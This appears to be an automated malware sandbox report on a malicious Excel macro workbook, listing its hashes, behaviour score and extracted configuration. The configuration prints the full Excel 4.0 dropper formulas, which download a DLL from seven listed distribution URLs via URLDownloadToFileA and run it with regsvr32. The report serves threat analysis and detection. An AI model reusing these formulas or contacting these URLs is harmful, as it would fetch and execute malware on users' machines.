Overview

overview

10

Static

static

10

8443880cc7...f.xlsm

windows7-x64

10

8443880cc7...f.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    8443880cc736734b39b641cd25144eb5868c2376c30c116365773569a6e4ca1f

  • Size

    73KB

  • Sample

    241120-taygnatmbl

  • MD5

    b1c7fadd1156dfd6865a1dd0ed97bee6

  • SHA1

    8962371fecdf21672ebc2f23314a8cf733ed7706

  • SHA256

    8443880cc736734b39b641cd25144eb5868c2376c30c116365773569a6e4ca1f

  • SHA512

    a648b488a86b6e44bbbc90b068d03e169347061a5acaf2108029e1906220efa3a0f3f88a5f8fcb37d090be8d9c448e9f8f510b8a4423a58e4c962568a1e10d50

  • SSDEEP

    1536:P1iiXSto0NSVUINwtzLT7OMuuAe0yOcfpXZGsMlVzc:P1iiCtzSmICpH7OZuvZGsMU

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://andjello.net/wp-includes/O74XNLzsodp/

http://andrewpharma.com/wp-includes/d8yxEkWRUU/

http://anneferrier.com/logs/Ia7oz193SZbb5N/

http://anaforainc.com/media/tUKKnlCd0QJDxWO/

http://allamapianoawards.com/quisint/RanfoIJhasZ0R33o/

http://amdrolls.com/Template/goRpY/

https://www.anagramme.net/admin_files/rOzDUUhjSMh/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://andjello.net/wp-includes/O74XNLzsodp/","..\ujg.dll",0,0) =IF('EGDGB'!F7<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://andrewpharma.com/wp-includes/d8yxEkWRUU/","..\ujg.dll",0,0)) =IF('EGDGB'!F9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://anneferrier.com/logs/Ia7oz193SZbb5N/","..\ujg.dll",0,0)) =IF('EGDGB'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://anaforainc.com/media/tUKKnlCd0QJDxWO/","..\ujg.dll",0,0)) =IF('EGDGB'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://allamapianoawards.com/quisint/RanfoIJhasZ0R33o/","..\ujg.dll",0,0)) =IF('EGDGB'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://amdrolls.com/Template/goRpY/","..\ujg.dll",0,0)) =IF('EGDGB'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.anagramme.net/admin_files/rOzDUUhjSMh/","..\ujg.dll",0,0)) =IF('EGDGB'!F19<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\ujg.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://andjello.net/wp-includes/O74XNLzsodp/

Targets

    • Target

      8443880cc736734b39b641cd25144eb5868c2376c30c116365773569a6e4ca1f

    • Size

      73KB

    • MD5

      b1c7fadd1156dfd6865a1dd0ed97bee6

    • SHA1

      8962371fecdf21672ebc2f23314a8cf733ed7706

    • SHA256

      8443880cc736734b39b641cd25144eb5868c2376c30c116365773569a6e4ca1f

    • SHA512

      a648b488a86b6e44bbbc90b068d03e169347061a5acaf2108029e1906220efa3a0f3f88a5f8fcb37d090be8d9c448e9f8f510b8a4423a58e4c962568a1e10d50

    • SSDEEP

      1536:P1iiXSto0NSVUINwtzLT7OMuuAe0yOcfpXZGsMlVzc:P1iiCtzSmICpH7OZuvZGsMU

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks